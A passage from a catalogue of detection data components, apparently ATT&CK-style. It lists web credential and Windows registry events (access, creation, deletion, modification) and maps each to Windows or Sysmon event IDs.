Description: Initial construction of new web credential material (ex: Windows EID 1200 or 4769)


Web Credential: Web Credential Usage

Current version: 1.0

Description: An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202)


Windows Registry: Windows Registry Key Access

Current version: 1.0

Description: Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656)


Windows Registry: Windows Registry Key Creation

Current version: 1.0

Description: Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)


Windows Registry: Windows Registry Key Deletion

Current version: 1.0

Description: Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)


Windows Registry: Windows Registry Key Modification

Current version: 1.0

Description: Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)